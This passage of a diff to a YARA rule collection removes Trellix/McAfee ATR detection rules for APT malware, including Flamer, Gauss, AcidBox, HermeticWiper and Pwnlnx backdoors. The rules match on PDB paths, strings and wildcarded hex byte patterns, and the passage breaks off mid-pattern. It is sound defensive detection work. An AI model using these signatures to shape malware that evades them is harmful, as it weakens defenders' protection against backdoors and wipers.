"c:\\Documents and Settings\\admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper Release\\Release.pdb" fullword ascii - $s2 = "%COMMON_APPDATA%" fullword ascii - $s3 = "%%WINDIR%%\\%s\\%s" fullword ascii - $s4 = "/s /n %s \"%s\"" fullword ascii - $s5 = "/c start /wait " fullword ascii - $s6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" fullword ascii - $s7 = "constructor or from DllMain." fullword ascii - $s8 = "ComSpec" fullword ascii - $s9 = "APPDATA" fullword ascii - $s10 = "WINDIR" fullword ascii - $s11 = "USERPROFILE" fullword ascii - - condition: - uint16(0)==0x5a4d and filesize <2000KB and all of them -} -rule TRELLIX_ARC_Apt_Flamer_Pdb : BACKDOOR FILE -{ - meta: - description = "Rule to detect Flamer based on the PDB" - author = "Marc Rivero | McAfee ATR Team" - id = "3bbe043d-c0dc-5aa2-b985-800a6d9038fd" - date = "2012-05-29" - modified = "2020-08-14" - reference = "https://www.forcepoint.com/ko/blog/x-labs/flameflamerskywiper-one-most-advanced-malware-found-yet" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/flamer_pdb.yar#L1-L25" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "554924ebdde8e68cb8d367b8e9a016c5908640954ec9fb936ece07ac4c5e1b75" - logic_hash = "3c1d3d015e086cff1f3d5add39397d8ed251b12144b31d8547165cbd0217735c" - score = 75 - quality = 70 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Flamer" - actor_type = "Apt" - actor_group = "Unknown" - - strings: - $pdb = "\\Projects\\Jimmy\\jimmydll_v2.0\\JimmyForClan\\Jimmy\\bin\\srelease\\jimmydll\\indsvc32.pdb" - - condition: - uint16(0)==0x5a4d and filesize <500KB and any of them -} -rule TRELLIX_ARC_APT_Acidbox_Kernelmode_Module : KERNELDRIVER FILE -{ - meta: - description = "Rule to detect the kernel mode component of AcidBox" - author = "Marc Rivero | McAfee ATR Team" - id = "80b60307-5431-5f21-9e6f-06adaab0519d" - date = "2020-07-24" - modified = "2020-08-14" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_acidbox.yar#L1-L32" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "e39da89d0da22115ac7889bc73ff183973a6c5334e304df955362bde76694d42" - score = 75 - quality = 70 - tags = "KERNELDRIVER, FILE" - rule_version = "v1" - malware_type = "kerneldriver" - malware_family = "Rootkit:W32/Acidbox" - actor_type = "APT" - actor_group = "Turla" - hash1 = "3ef071e0327e7014dd374d96bed023e6c434df6f98cce88a1e7335a667f6749d" - - strings: - $pattern_0 = { 897c2434 8978b8 8d5f28 448bc3 33d2 } - $pattern_1 = { 4c8d842470010000 488d942418010000 498bcf e8???????? 8bd8 89442460 } - $pattern_2 = { 4c8bf1 49d1eb 4585c9 0f88a2000000 440fb717 498bd0 } - $pattern_3 = { ff15???????? 4c8d9c2480000000 498b5b10 498b7318 498b7b20 4d8b7328 498be3 } - $pattern_4 = { 33d2 41b8???????? 895c2420 e8???????? } - $pattern_5 = { 895c2420 4885ff 0f8424010000 440f20c0 84c0 0f8518010000 } - $pattern_6 = { 85f6 0f8469fdffff 488d8424c8010000 41b9???????? } - $pattern_7 = { 894c2404 750a ffc7 893c24 41ffc3 ebcb 85c9 } - $pattern_8 = { 488b5c2450 488b742458 488b7c2460 4883c430 } - $pattern_9 = { 33d2 488b4c2428 e8???????? 448b842450040000 4503c0 4c8d8c2450040000 488bd7 } - - condition: - 7 of them and filesize <78848 -} -rule TRELLIX_ARC_APT_Acidbox_Main_Module_Dll : BACKDOOR FILE -{ - meta: - description = "Rule to detect the Main mode component of AcidBox" - author = "Marc Rivero | McAfee ATR Team" - id = "8c9beb0f-62f7-5788-8340-0b1ecdf54253" - date = "2020-07-24" - modified = "2020-08-14" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_acidbox.yar#L34-L65" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "db98e204742b8629074d47df301ffcbb2dfb977a4da91557fb50838aae79e777" - score = 75 - quality = 70 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Acidbox" - actor_type = "APT" - actor_group = "Turla" - hash1 = "eb30a1822bd6f503f8151cb04bfd315a62fa67dbfe1f573e6fcfd74636ecedd5" - - strings: - $pattern_0 = { 7707 b8022d03a0 eb05 e8???????? } - $pattern_1 = { 4403c8 8bc3 41d1c6 33c6 81c6d6c162ca c1cb02 33c7 } - $pattern_2 = { e9???????? 412b5c2418 8b45dc 412b442408 41015c241c 410144240c 015f1c } - $pattern_3 = { 48895c2408 57 4883ec30 488bfa 33db 4885c9 7479 } - $pattern_4 = { 48895c2408 57 4883ec30 498bd8 488bfa 488364245800 85c9 } - $pattern_5 = { 488987e0010000 e9???????? 81cb001003a0 e9???????? 488b87a0010000 44847806 742e } - $pattern_6 = { 4d8bcc 4c8d0596c50100 498bd4 488bce e8???????? 498b9de0010000 c74605aa993355 } - $pattern_7 = { 4533c0 8d5608 e8???????? 488bf0 4889442460 4885c0 750b } - $pattern_8 = { 488d5558 41c1ee08 41b802000000 44887559 e8???????? 4c8b4de0 894718 } - $pattern_9 = { 4d03c2 4d3bc2 4d13cc 4d0303 4d3b03 4d8903 4c8b13 } - - condition: - 7 of them and filesize <550912 -} -rule TRELLIX_ARC_APT_Acidbox_Ssp_Dll_Module : BACKDOOR FILE -{ - meta: - description = "Rule to detect the SSP DLL component of AcidBox" - author = "Marc Rivero | McAfee ATR Team" - id = "ef1511c5-f650-5e65-937c-466f00932183" - date = "2020-07-24" - modified = "2020-08-14" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_acidbox.yar#L67-L98" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "4c9b9de11d73587ca1ad1efa5455598e41edc5a9a59fc0339c429a212c1c7941" - score = 75 - quality = 70 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Acidbox" - actor_type = "APT" - actor_group = "Turla" - hash1 = "003669761229d3e1db0f5a5b333ef62b3dffcc8e27c821ce9018362e0a2df7e9" - - strings: - $pattern_0 = { 49897ba0 8bc7 49894398 49897ba8 33c9 49894bb0 } - $pattern_1 = { 8b8424a8000000 c1e818 88443108 66895c310a 498b0e } - $pattern_2 = { 8b5f48 413bdd 410f47dd 85db 0f84f1000000 488b4720 4885c0 } - $pattern_3 = { e8???????? 85c0 78c7 488d9424a0020000 488d8c24e0030000 ff15???????? 4c8bf8 } - $pattern_4 = { ff15???????? 488bc8 4c8bc6 33d2 ff15???????? 8bfb 895c2420 } - $pattern_5 = { 415f c3 4c8bdc 49895b10 } - $pattern_6 = { 488d842488010000 4889442420 41bf???????? 458bcf 4c8bc7 418bd7 488d8c2490000000 } - $pattern_7 = { c1e908 0fb6c9 3bce 77b6 8bd0 b9???????? c1ea10 } - $pattern_8 = { 4c8bc3 ba???????? 488d4c2438 e8???????? 89442430 85c0 7508 } - $pattern_9 = { bb02160480 8bc3 488b5c2440 488b742448 488b7c2450 4883c430 } - - condition: - 7 of them and filesize <199680 -} -rule TRELLIX_ARC_Apt_Lagulon_Trojan_Pdb : TROJAN FILE -{ - meta: - description = "Rule to detect trojan Lagulon based on PDB" - author = "Marc Rivero | McAfee ATR Team" - id = "a31a465d-1f16-5c3e-a62d-ea15c11253c3" - date = "2013-08-31" - modified = "2020-08-14" - reference = "https://www.cylance.com/operation-cleaver-cylance" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_lagulon_pdb.yar#L1-L25" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "e401340020688cdd0f5051b7553815eee6bc04a5a962900883f1b3676bf1de53" - logic_hash = "dad04c2deb990f253f952b768b74349dc9afb5f6db91ea3afff889f4c9f3230b" - score = 75 - quality = 70 - tags = "TROJAN, FILE" - rule_version = "v1" - malware_type = "trojan" - malware_family = "Trojan:W32/lagulon" - actor_type = "Apt" - actor_group = "Unknown" - - strings: - $pdb = "\\proj\\wndTest\\Release\\wndTest.pdb" - - condition: - uint16(0)==0x5a4d and filesize <50KB and any of them -} -rule TRELLIX_ARC_Hermeticwiper : TROJAN FILE -{ - meta: - description = "Detecting variants of Hermetic Wiper malware discovered in UA" - author = " cb @ Trellix ATR" - id = "fc6d9238-b732-541d-b083-11b43fe8770d" - date = "2022-02-24" - modified = "2022-02-24" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_Troj_HermWiper.yar#L1-L27" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "b48e91afa19e09c7035ccda1b9293448e834d612b9a953b593f9412acb78faac" - score = 75 - quality = 70 - tags = "TROJAN, FILE" - rule_version = "v1" - malware_type = "Trojan" - - strings: - $0 = {E4B5518CD941310A015E4AF8E5968C8231492FE19246A293A569D5D7A36F56EB2FC5B68FFF6F3359C19AF6806920C3FE6628F90A75440E6616297A031BA6075100D72DFAA9829E772E45D77B89F862081EAFDB19B4B2DCEF3F273FF645ACCEAA4B991F98373973C0FB25829E860D9BC195EF1A0AD9219456AD077D42868EE03EE00E88D04C434BA97E88DF99273A35E2C668A1C69954B4762390ABDFBE4CD4AF} - $1 = {90506F1C825F7AE0D8605F5C627CA325BFF199AB60A63DE8A90E923F4B18D7FB039E1DEC89D573AAB0A14C1D4BA70EB444753A41C03082A60CB4DB551393F2C50988A3181E7F31D01B5AAD94070432D98F18655AB8A555919FEFEA9DE1EDF1} - $2 = {D5EEF61336015A85FF04ED298A6BDD6742FF153E33DAF9B383A5FFDCE7E64D47748DB5FF2609DF9BD5C66735FF6916797B2D365313FF1461EAEB9DAEA754FF6D4D55D1956CC8CBFF75C10CE74BF88C8DFF3B553B839D42609FFF2916227230} - $3 = {6C750DDC932124500CE9B5AB91CE101BE9AD348220E9423124512282373675152281023428825C51770FE9841F853375125382F732750A5B83F60FEB6AEE2282647462228269745AEE22826F7452228275744AEE2282787442} - $4 = {19A8A063FFAAAF6C1E7F78A896FFFA5C8F30BA98B69CFF1961E107BEB7636AFF9EA56A4FC4EDE3F1FF295235ACD0185726FFADA6B8CB54B342C9FF86F58524DC91617BFFB4388DBE01B6CF86} - $5 = {50C449606B20184A6328556032197660AAF9507861609F6160640560B4546160C3A194056070C4A09EC4A01A0461A4C4A0831B16600561916069A291607061C09160AA1CB6204A} - $6 = {FFEB19D2636B8B95273156BB63E8C78470D55970F47CF26574B46DE86EE084704590CA8053F15320258BBD1AACF18B04F2E965C6605CB10880B7E8FCF53DF5EB0621635EFF} - $7 = {7E31126E14B8FF98554F6FCFB64207FFCF8D93B2573609C2FF99E4409F73BB9322FF1E5E380DC0BBABCAFF4B901EDF61BD6A68FFEE3253728C7769ABFF7BCDA939C959A282} - $8 = {1970FFC6F8AA7C32EE693CFF369579E5355EF62CFF682CEAF20BA3EA1CFF1AAC638666431B20FF54293D1E709C231AFFCD11B55599F64CB9FF1E5A9015DC867F} - $9 = {8DFF93B2573609C299E4FF409F73BB93221E5EFF380DC0BBABCA4B90FF1EDF61BD6A68EE32FF53728C7769AB7BCDFFA939C959A282D312FF5DD04F0370CE811F} - $10 = {DF5519064E31101CF3DA96C15FF96728B708F358F51759E3A22FFA1CF1BB986A2038D6753E6BF037945B8469ADF20BAB71E10F3DE27735F640704C970DFE8672} - - condition: - uint16(0)==0x5a4d and filesize <200KB and all of them -} -rule TRELLIX_ARC_Apt_Gauss_Pdb : BACKDOOR FILE -{ - meta: - description = "Rule to detect Gauss based on PDB" - author = "Marc Rivero | McAfee ATR Team" - id = "209223cc-16e5-5596-8744-21ad71b5ec2a" - date = "2012-08-14" - modified = "2020-08-14" - reference = "https://securelist.com/the-mystery-of-the-encrypted-gauss-payload-5/33561/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/gauss_pdb.yar#L1-L25" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "7b0d0612b4ecc889a901115c2e77776ef0ea65c056b283d12e80f863062cea28" - logic_hash = "cb20c87ea976f395e000f2c631ffd52b09dca2af37adceafe5be72b37f75a997" - score = 75 - quality = 70 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Gauss" - actor_type = "Apt" - actor_group = "Unknown" - - strings: - $pdb = "\\projects\\gauss\\bin\\release\\winshell.pdb" - - condition: - uint16(0)==0x5a4d and filesize <550KB and any of them -} import "pe" rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_1 : BACKDOOR FILE @@ -189821,575 +192841,209 @@ rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_1 : BACKDOOR FILE uint16(0)==0x457f and filesize <100KB and all of them } import "pe" - -rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_2 : BACKDOOR FILE -{ - meta: - description = "Rule to detect the backdoor pwnlnx variant 2" - author = "Marc Rivero | McAfee ATR Team" - id = "c4ee686b-49d9-5566-b749-1144a19c1fee" - date = "2020-04-17" - modified = "2020-08-14" - reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_decade_of_RATs.yar#L35-L65" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "08cc67002782cbafd97a4bff549d25dd72d6976d2fdf79339aaf5a3ff7c3107e" - logic_hash = "08ea40ba72677263a41f62097fc38040361ba595d67cb04979b66548c7f4d271" - score = 75 - quality = 70 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Pwnlnx" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $bp = { 7F??4C4602??01??000000000000000002??3E????0000000004??00000000??????00000000000088????????????00000000??????38??05????????????????0000????????????0000000000000000??????0000000000004000000000??????0D??????????????0D????????0000????00000000????0000????0000????????????0000????????????0000????????????0000????12??00000000????????????00000000????00000000??????000004??00005801??00000000??????4000000000??????4000000000????????00000000????????00000000??????000000000000070000??????000080??????0000000080??????0000000080??????0000000028??00000000000070??00000000000008??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000??????000010??000001??0000474E5500000000????0000????0000????0000??????000014??000003??0000474E55????????????CC78??78??83????????????CB371F0000000080??????0000000025????????0000????7E??00000000????????????0000????????????0000??????4200000000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000??????4200000000????????????0000????????????0000??????4200000000????????????0000????????????0000????????????0000????76??00000000????????????0000????8B????00000000C8??????0000000025????????0000??????4200000000????76??00000000????????????0000????444200000000????76??00000000????????????0000??????4900000000????76??00000000????????????0000??????4600000000????76??00000000????????????0000????424200000000??????EC08??33??0000E8????????E8????????4883????C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????00000000000000000000000000000000000000000000000031??4989??5E4889??4883????505449C7??????????48C7??????????48C7??????????E8????????F490904883????488B??????????4885??74??FF??4883????C390909090909090909090909090554889??534883????80????????????75??BB????????488B??????????4881??????????48C1????4883????4839??73??660F1F??????4883????4889??????????FF????????????488B??????????4839??72??B8????????4885??74??BF????????E8????????C6????????????4883????5BC9C30F1F????????????55B8????????4885??4889??74??BE????????BF????????E8????????4883????????????74??B8????????4885??74??BF????????C9FF??0F1F??????????C9C39090554889??534881??????????89??????????48C7????????????8B????3D????????0F87????????8B????89??488D??????????8B??????????4889??89??E8????????85??0F84????????8B????89??488D??????????89??4889??E8????????BA????????488D??????????4889??4889??E8????????4889????4883??????0F84????????488D??????????488D??????????4889??4889??E8????????85??0F85????????488B??????????4889????C7????????????488B????89????488B????48C1????89????488B????4889????488B????4889??????488B????4889??????E8????????89????BE????????488D????E8????????488D????8B??????????BA????????4889??89??E8????????85??0F84????????488D????8B??????????BA????????4889??89??E8????????85??0F84????????BE????????488D????E8????????8B????488B????4889????488B????4889??????488B????4889??????E8????????39??0F85????????8B????89??4889??48C1????8B????89??488D????4889????488B????488B????BA????????4889??4889??E8????????488B????4889????EB??488B????488D??????????4889??BA????????BE????????4889??E8????????89????83??????7E??8B????488D??????????89??4889??E8????????8B????4863??488D??????????8B??????????4889??89??E8????????85??74??8B????48984801????488B????483B????7C??EB??90EB??90EB??90EB??90EB??90EB??90488B????4889??E8????????EB??90EB??90EB??90B8????????4881??????????5BC9C3554889??534881??????????4889??????????E8????????4889??E8????????C7????????????488B??????????8B????89????488B??????????8B??89????488B??????????8B????89????8B????8B????BA????????89??89??E8????????89????83??????0F84????????488D????BA????????BE????????4889??E8????????C7????????????C7????????????8B????89????488B????4889????488B????4889??????488B????4889??????E8????????89????488D????BE????????4889??E8????????488D????8B????BA????????4889??89??E8????????85??0F84????????488D??????????4889??E8????????488D??????????BE????????4889??E8????????488D??????????8B????BA????????4889??89??E8????????85??0F84????????488D????8B????BA????????4889??89??E8????????85??74??488D????BE????????4889??E8????????8B????488B????4889????488B????4889??????488B????4889??????E8????????39??75??8B????83????75??8B????488B????4889????488B????4889??????488B????4889??????89??E8????????EB??90EB??90EB??90EB??90EB??908B????89??E8????????B8????????4881??????????5BC9C390554889??4889????89????C7????????????488B????4889????C7????????????EB??488B????0FB6??8B????89??C1????F7????89??48980FB6??????????89??31??488B????88??83??????4883??????8B????3B????7C??488B????C9C3554889??4889????89????488B????4889????C7????????????EB??488B????0FB6??0FB6??????????31??488B????88??83??????4883??????8B????3B????7C??488B????C9C39090554889??534881??????????89??????????48C7????????????48C7????????????48C7????????????8B????89??488D??????????8B??????????4889??89??E8????????85??0F84????????8B????89??488D??????????89??4889??E8????????488D??????????488D??????????4889??4889??E8????????BA????????488D??????????488D??????????BE????????4889??B8????????E8????????488D??????????4889??E8????????4883????4889??E8????????4889????4883??????0F84????????488D??????????488B????4889??4889??E8????????488D??????????488D????B9????????BA????????4889??4889??E8????????89????83??????0F8E????????C7????????????E9????????488B????8B????4863??48C1????4801??488B??488D????BA????????488D??????????488D??????????4989??BE????????4889??B8????????E8????????488D??????????488D??????????4889??4889??E8????????85??0F85????????48C7????????????48C7????????????488D??????????4883????4889??E8????????4889??E8????????488B??????????8B??????????4189??4181??????????8B??????????89??81??????????488B????8B????4863??48C1????4801??488B??488D????BA????????488D??????????4889??????4889??????488B????4889??????488B????4889????4589??4189??4889??BE????????4889?? } - - condition: - uint16(0)==0x457f and filesize <1000KB and all of them -} -import "pe" - -rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_3 : BACKDOOR FILE -{ - meta: - description = "Rule to detect the backdoor pwnlnx variant" - author = "Marc Rivero | McAfee ATR Team" - id = "02ea1eb2-7235-5ed5-86ba-19d52e8fb428" - date = "2020-04-17" - modified = "2020-08-14" - reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_decade_of_RATs.yar#L67-L97" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "08f29e234f0ce3bded1771d702f8b5963b144141727e48b8a0594f58317aac75" - logic_hash = "8a1405f430ce57810577f65ef43a1425601bf49b5adb4f6f935505427ad9dc94" - score = 75 - quality = 70 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Pwnlnx" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $bp = { 7F??4C4602??01??000000000000000002??3E????0000000004??00000000??????000000000000B0??3A??000000000000000040??????????????????????01??000005????????0000000000000000??????0000000000004000000000????????????0000????????????00000000????00000000????0000????0000????A40C??00000000C0??????????????C0??????????????5013??00000000????????????00000000????00000000??????000004??00005801??00000000??????4000000000??????4000000000????000000000000????000000000000??????000000000000070000??????0000C0??????????????C0??????????????C0??????????????28??00000000000078??00000000000008??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000??????000010??000001??0000474E5500000000????0000??????000000000000C0????????????????????????0000????84????00000000C8??????0000000025????????0000????374200000000????A56C00000000????????????0000????????????0000????A56C00000000????????????0000??????4200000000????A56C00000000????????????0000????24??00000000????A56C00000000????????????0000????????????0000????A56C00000000????????????0000????83??????0000????A56C00000000????????????0000????5E42000000000000A66C00000000????????????0000??????4200000000????A66C00000000????????????0000????914200000000????A66C00000000????????????0000??????4200000000????A66C00000000????????????0000????????????0000????A66C00000000????????????0000????????????0000????A66C00000000????????????0000??????4200000000????A66C00000000????????????0000??????4200000000??????EC08??4301??????62??0000E8????????4883????C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????00000000000000000000000000000000000000000000000031??4989??5E4889??4883????505449C7??????????48C7??????????48C7??????????E8????????F490904883????488B??????????4885??74??FF??4883????C390909090909090909090909090B8????????55482D????????4883????4889??76??B8????????4885??74??5DBF????????FF??660F1F????????????5DC366666666????????????????????BE????????554881??????????48C1????4889??4889??48C1????4801??48D1??74??B8????????4885??74??5DBF????????FF??0F1F??5DC3660F1F??????80????????????75??554889??53BB????????4881??????????4883????488B??????????48C1????4883????4839??73??660F1F??????4883????4889??????????FF????????????488B??????????4839??72??E8????????B8????????4885??74??BF????????E8????????C6????????????4883????5B5DF3??669055B8????????4885??4889??74??BE????????BF????????E8????????BF????????4883????75??5DE9????????6690B8????????4885??74??FF??EB??9090554889??534881??????????89??????????48C7????????????8B????3D????????76??E9????????8B????89??488D??????????8B??????????4889??89??E8????????85??75??E9????????8B????89??488D??????????89??4889??E8????????488D??????????BE????????4889??E8????????4889????4883??????75??E9????????488D??????????488D??????????4889??4889??E8????????85??74??E9????????488B??????????4889????C7????????????488B????89????488B????48C1????89????4883????FF????FF????FF????E8????????4883????89????BE????????488D????E8????????8B??????????BA????????488D????89??E8????????85??75??E9????????8B??????????BA????????488D????89??E8????????85??75??E9????????BE????????488D????E8????????8B????4883????FF????FF????FF????E8????????4883????39??74??E9????????8B????89??48C1????4889??8B????89??4801??4889????488B????488B????BA????????4889??4889??E8????????488B????4889????EB??488B????488D??????????4889??BA????????BE????????4889??E8????????89????83??????7F??EB??8B????488D??????????89??4889??E8????????8B????4863??488D??????????8B??????????4889??89??E8????????85??75??EB??8B????48984801????488B????483B????7C??488B????4889??E8????????B8????????488B????C9C3554889??534881??????????4889??????????E8????????4889??E8????????C7????????????488B??????????8B????89????488B??????????8B??89????488B??????????8B????89????8B????8B????BA????????89??89??E8????????89????83??????75??E9????????488D????BA????????BE????????4889??E8????????C7????????????C7????????????8B????89????4883????FF????FF????FF????E8????????4883????89????488D????BE????????4889??E8????????488D????8B????BA????????4889??89??E8????????85??75??E9????????488D??????????4889??E8????????488D??????????BE????????4889??E8????????488D??????????8B????BA????????4889??89??E8????????85??75??EB??488D????8B????BA????????4889??89??E8????????85??75??EB??488D????BE????????4889??E8????????8B????4883????FF????FF????FF????E8????????4883????39??74??EB??8B????83????74??EB??8B????4883????FF????FF????FF????89??E8????????4883????908B????89??E8????????B8????????488B????C9C3554889??4889????89????C7????????????488B????4889????C7????????????EB??488B????0FB6??8B????99F7????89??48980FB6??????????31??89??488B????88??83??????4883??????8B????3B????7C??488B????5DC3554889??4889????89????488B????4889????C7????????????EB??488B????0FB6??0FB6??????????31??488B????88??83??????4883??????8B????3B????7C??488B????5DC39090554889??534881??????????89??????????48C7????????????48C7????????????48C7????????????8B????89??488D??????????8B??????????4889??89??E8????????85??75??E9????????8B????89??488D??????????89??4889??E8????????488D??????????488D??????????4889??4889??E8????????488D??????????488D??????????4889??BA????????BE????????4889??B8????????E8????????488D??????????4889??E8????????4883????4889??E8????????4889????4883??????75??E9????????488D??????????488B????4889??4889??E8????????488D????488D??????????B9????????BA????????4889??E8????????89????83??????0F8E????????C7????????????E9????????488B????8B????4863??48C1????4801??488B??488D????488D??????????488D??????????4989??4889??BA????????BE????????4889??B8????????E8????????488D??????????488D??????????4889??4889??E8????????85??0F85????????48C7????????????48C7????????????488D??????????4883????4889??E8????????4889??E8????????4989??488B??????????8B??????????25????????89??8B??????????25????????89??488B????8B????4863??48C1????4801??488B??488D????488D??????????415052FF????FF????4189??4189??BA????????BE????????4889??B8????????E8????????4883????488B????4889??E8????????4889??488D?????????? } - - condition: - uint16(0)==0x457f and filesize <4000KB and all of them -} -import "pe" - -rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_4 : BACKDOOR FILE -{ - meta: - description = "Rule to detect the backdoor pwnlnx variant 4" - author = "Marc Rivero | McAfee ATR Team" - id = "199bb534-f0f6-5b67-aedd-3eada5e45cc6" - date = "2020-04-17" - modified = "2020-08-14" - reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_decade_of_RATs.yar#L99-L129" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "2590ab56d46ff344f2aa4998efd1db216850bdddfc146d5d37e4b7d07c7336fc" - logic_hash = "11203beee446aaf0783d3a8d3839a88ef16c27d52be8670d650ebf6a1de2c3aa" - score = 75 - quality = 70 - tags = "BACKDOOR, FILE" - rule_version = "v1" - malware_type = "backdoor" - malware_family = "Backdoor:W32/Pwnlnx" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $bp = { 7F??4C4602??01??000000000000000001??3E????000000000000000000000000000000000000????????????000000000000??????0000000040??????????????000014??000003??0000474E55????9FECFBE5??F973??EB??2A??????????71??BD????????0000000000000000554889??53E8????????FF????????????4889??4889??4881??????????FF????????????4889??5BC9C30F1F??????554889??E8????????FF????????????C9C366666666????????????????????554889??E8????????4885??74??4C8B????4D85??74??65??8B????????????8B??????????4889??????????48C7??????????89??C1????C1????01??25????????29??48984C89????????????FF??????????C9C3660F1F????????????31??C9C36666662E????????????????554889??E8????????4889??????????48C7??????????FF??????????C9C390554889??E8????????8B??????????488B??????????488D????0FB6????3C??400F94??3C??410F94??74??4084??75??B8????????C9C30F1F????????????8B??????????39????74??3B????74??4584??74??8B??????????4801??0FB7??????????66????74??66??????75??4889??41FF??B8????????C9C30F1F??4084??74??8B??????????4801??0FB7??????????66????75??EB??0F1F????554889??534883????E8????????31??4889??31??E8????????483D????????77??4885??74??488B????488B????488B????488B????4889??????????31??4889??E8????????31??4883????5BC9C383????EB??662E0F1F????????????554889??415453E8????????4989??4889??31??31??E8????????483D????????77??488B????31??4889??488B????488B????488B????488B??????????4989????4889??????????E8????????31??5B415CC9C383????EB??0F1F??????554889??534883????E8????????31??4889??31??E8????????483D????????77??4885??74??488B????488B????488B????488B????4889??????????31??4889??E8????????31??4883????5BC9C383????EB??662E0F1F????????????554889??415453E8????????4989??4889??31??31??E8????????483D????????77??488B????31??4889??488B????488B????488B????488B??????????4989????4889??????????E8????????31??5B415CC9C383????EB??0F1F??????554889??534883????E8????????31??4889??BE????????E8????????483D????????77??4885??74??488B????4889????31??4889??E8????????31??4883????5BC9C383????EB??660F1F??????554889??415453E8????????4989??4889??BE????????31??E8????????483D????????77??488B????31??4889??488B????4989????488B????4889????E8????????31??5B415CC9C383????EB??554889??4157415641554154534883????E8????????4889??488D????4989??4189??4889??BA????????4989??4489????4D89??E8????????488B??????????448B????4881??????????488D????75??EB??0F1F????488B????4881??????????488D????74??0FB7????4839??75??4883????31??5B415C415D415E415FC9C30F1F??????4D89??4C89??4489??4889??4C89??FF??????????4883???